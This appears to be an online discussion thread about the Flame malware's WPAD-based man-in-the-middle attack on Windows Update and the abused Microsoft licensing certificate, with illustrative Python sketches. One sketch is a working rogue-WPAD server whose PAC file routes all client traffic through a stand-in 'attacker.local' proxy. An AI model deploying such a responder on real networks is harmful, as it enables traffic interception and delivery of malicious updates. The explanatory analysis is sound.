Flame took advantage of WPAD, a little-known magical hostname (http://en.wikipedia.org/wiki/Web_Proxy_Autodiscovery_Protoco...), to mount MITM attacks against Windows Update.
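A minimal sketch of why WPAD is so dangerous (this is an illustration, not Flame's actual code, and `attacker.local:8080` is a made-up address): any machine that wins the name "wpad" on the local network gets asked for a proxy auto-config file, and can answer with a PAC script that routes every client's HTTP traffic through itself.

```python
# Toy rogue-WPAD responder: serve a wpad.dat PAC file that points all
# traffic at an attacker-controlled proxy. In the real attack, winning
# the "wpad" name resolution is the hard part; serving the file is this easy.
from http.server import BaseHTTPRequestHandler, HTTPServer
import threading
import urllib.request

# PAC files are tiny JavaScript programs; clients call FindProxyForURL()
# for every request and obey the returned proxy.
PAC = b'function FindProxyForURL(url, host) { return "PROXY attacker.local:8080"; }'

class WpadHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/wpad.dat":
            self.send_response(200)
            self.send_header("Content-Type", "application/x-ns-proxy-autoconfig")
            self.end_headers()
            self.wfile.write(PAC)
        else:
            self.send_response(404)
            self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass

# Bind to loopback on an ephemeral port and serve in the background.
server = HTTPServer(("127.0.0.1", 0), WpadHandler)
threading.Thread(target=server.serve_forever, daemon=True).start()

# A "victim" fetching its proxy config now gets the attacker's PAC file.
url = f"http://127.0.0.1:{server.server_port}/wpad.dat"
print(urllib.request.urlopen(url).read().decode())
server.shutdown()
```

Once a client obeys that PAC file, the attacker proxies its Windows Update requests, which is where the forged certificate came in.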
Flame then installed 'WuSetupV.exe', described as "Desktop Gadget Platform" ("Allows you to display gadgets on your desktop").
What's amazing is that Windows Update doesn't require explicit validation of an update-only certificate chain. It seems like any certificate that chains to the Microsoft root can certify updates (!).
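The missing check can be sketched as a toy model (hypothetical certificate names in a plain dict, nothing like the real Windows CryptoAPI): a chain that merely terminates at the trusted root passes the lax test, and only an additional per-certificate usage check (the EKU idea) would reject a licensing cert being used to sign updates.

```python
# Toy trust model: each cert records its issuer and its allowed usages.
# All names and usages here are invented for illustration.
ROOT = "Microsoft Root"

CERTS = {
    # name: (issuer, allowed usages)
    "Microsoft Root":       (None,             {"any"}),
    "MS Update Signing CA": ("Microsoft Root", {"code-signing", "windows-update"}),
    "Terminal Services LS": ("Microsoft Root", {"license-server"}),
}

def chain_to_root(name):
    """Walk issuer links upward; return the chain if it ends at the trusted root."""
    chain = []
    while name is not None:
        if name not in CERTS:
            return None
        chain.append(name)
        name = CERTS[name][0]
    return chain if chain[-1] == ROOT else None

def may_sign_updates(name):
    """The flaw: treat any chain back to the root as good enough."""
    return chain_to_root(name) is not None

def may_sign_updates_strict(name):
    """The fix: the signer itself must carry an update-signing usage."""
    chain = chain_to_root(name)
    return chain is not None and "windows-update" in CERTS[name][1]

# The licensing cert passes the lax check but fails the strict one:
print(may_sign_updates("Terminal Services LS"))         # True  (the hole)
print(may_sign_updates_strict("Terminal Services LS"))  # False (with usage check)
```

In this toy model the Terminal Services cert is perfectly valid as a chain, which is exactly why chain validity alone was not enough.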
I wonder how hard this hole will be to fix. I also wonder, as many have, whether this was written by an intelligence agency and, if so, whether they had access to Windows' source code.
Zombies in the compound indeed.
I hope Microsoft can deliver the revoked certificates in a trustworthy manner.
What could have happened, however, is that the said "intelligence agency" first created malware to infect MSFT engineers' computers, harvested their code-repository credentials, and then spoofed themselves as MSFT employees to download the source code. This is a lot more plausible considering what Stuxnet and Flame can already do (assuming they were made by the same agency).
MSFT should really check the systems of their employees first.
Microsoft licenses product source code to qualified customers, enterprises, governments, and partners for debugging and reference purposes.
Drop 'em an email if you're curious.
Compaq couldn't just copy IBM's BIOS to make their new machine guaranteed IBM-compatible; that would have been illegal, and easily proven by IBM.
Solution: reverse-engineer IBM's BIOS. Compaq used two sets of programmers: one group analyzed the original code and made notes of exactly how it responded.
The second group took those notes and wrote their own BIOS that behaved exactly the same.
The Microsoft Shared Source Initiative:
In 2003, MS gave China access to their source.
Quite a demonstration that even if you go to great pains to secure the code, if you aren't careful with your credentials, then it's all for nothing.
I always remind myself I'm not as smart as I think I am.
Our main line of defense, the fort d'Ében-Émael, had been built by German workers. The German army had its plans and knew the weak point of the fort: its vast, undefended roof (the soldiers used it as a football field).
During a dark night, they landed with gliders on the roof, and manually set up shaped charges to destroy the turrets, which were resistant to conventional bombs.
Shaped charges: http://en.wikipedia.org/wiki/Shaped_charge , and the damage seen from the outside: http://upload.wikimedia.org/wikipedia/commons/thumb/f/f6/Ebe...
Edited to reconcile my foggy memory with the historical record...
The roof should have been mined, but the soldiers petitioned the hierarchy to keep their sports field...
You mean the bad news.
Is anyone else infuriated that a vulnerability like this exists in what is analogous to copy protection code?
In other words, if Microsoft had been spending more of their resources on making software work, instead of making software work only when you've proven you've paid for it, this particular issue would not exist.
I suppose I can break it down another way.
Complexity introduces vulnerabilities.
Some complexity is necessary for the software to accomplish what the customer wants.
Some complexity is arguably necessary to protect the interests of the vendor. This is arguable because it varies between open source and proprietary software.
To me, it is upsetting when the code to protect the vendor's interests is where a critical security vulnerability exists. I don't think this is a controversial statement.
Cryptographically signed binaries are not used to manage licensing issues; they are used to make sure that no one intercepts your download and replaces it with a malicious binary. It is absolutely essential that computer programs be signed or delivered over a secure connection.
Losing your signing keys jeopardizes the entire system: new keys must be generated and securely distributed (this is hard).
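The integrity property described above can be sketched in a few lines. Real code signing uses an asymmetric signature over the digest; a bare hash comparison stands in for that here, and all payloads and function names are invented for illustration.

```python
# Minimal sketch of download integrity: refuse to install a payload whose
# digest does not match what the publisher vouched for out-of-band.
import hashlib

def publish(payload: bytes) -> str:
    """Publisher side: compute the digest that would get signed/distributed."""
    return hashlib.sha256(payload).hexdigest()

def install(payload: bytes, expected_digest: str) -> bool:
    """Client side: verify before running anything."""
    return hashlib.sha256(payload).hexdigest() == expected_digest

update = b"genuine update bytes"
digest = publish(update)

print(install(update, digest))                       # True
print(install(b"attacker swapped this in", digest))  # False
```

The key-management problem is exactly that `digest` (or the key that signs it) must reach clients through a channel the attacker cannot tamper with; once a signing key leaks, every check built on it passes for the attacker too.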
> To me, it is upsetting when the code to protect the vendor's interests is where a critical security vulnerability exists.
Yes, that would be upsetting if it were true. But it isn't. The whole system is in place to protect you, the customer.
The entire reason the attackers could use the certificate was because Microsoft left behind that functionality in the suite of software that allows enterprise customers to license their instances of Terminal Servers.
I am not railing against cryptographic signing as a concept -- what happened was Microsoft played fast and loose with their certificate chain in order to provide their customers with a way to prove that they had paid for software.
The certificate chain could have been a lot cleaner if that licensing bit wasn't necessary.
The chances of someone slipping in a backdoor in kernel releases are very slim.
But you can always get the source and build the package yourself. Can you do that with Windows?
The downside of trusting certificates is that you're abstracting trust to the point that you (where you == the IT industry) stop questioning who can do what. You trust something absolutely, but that trust rests on lots of people whom you don't know doing the right thing without making mistakes.
In fact, there is no company or software community anywhere that writes highly complex and bug free software. It's not possible.
> In fact, there is no company or software community anywhere that writes highly complex and bug free software. It's not possible.
I agree with this point. For this reason, the point I'm trying to make is that reducing complexity is a key way to make software more secure. And when reducing complexity, we should look at what is in the user's best interest.
Code has bugs--that is an inescapable fact for the foreseeable future. Therefore, any code running on your computer makes you slightly less safe. Therefore, any code on your machine which is not accomplishing something in your best interests could be considered an unnecessary security risk.
I am arguing that it is not in your best interest to ensure that you bought a little certificate from Microsoft before your computer operates the way you have configured it to.
After all that, of course it is in your best interests to have Microsoft grow its war chest and be a healthy company that can employ tens of thousands of smart developers to write good code (which we choose to keep using year after year).
But, every time a product breaks because they have to make sure I'm not a criminal, and the way they do it is sloppy, I get upset, and I think it's rightfully so. Usually it is small, proprietary CMS or CRM software that drives me crazy. But today it's this issue.
The "bug" here was in key management, not in software running on my computer.
The code that caused the certificate chain to be compromised is related to licensing Terminal Services on Windows Server. That is how their key management failed, and that is what I'm railing against: the fact that this ability to sign binaries with a legitimate Microsoft certificate has been hidden away in copies of Windows Server for years by mistake -- and not for any direct customer benefit, but to implement a licensing scheme.
I'm on the fence about this issue, honestly. Part of me feels like they believe passionately that we're stepping into new, dangerous territory. The other part of me indeed feels like this is great advertising for not only them, but their industry (And they're going to push it all they can).
But the fact of the matter is they admit they can't protect you, whoever you are, from these types of targeted attacks. I've seen well-respected speakers from Defcon go back and forth with Mikko on Twitter about the efficacy of AV.
It sucks that you (the parent) are being downvoted, but this is a real issue, what with the incredible amount of FUD that comes with every serious attack.
EDIT: My mistake in misspelling Mikko's name. Sorry about that.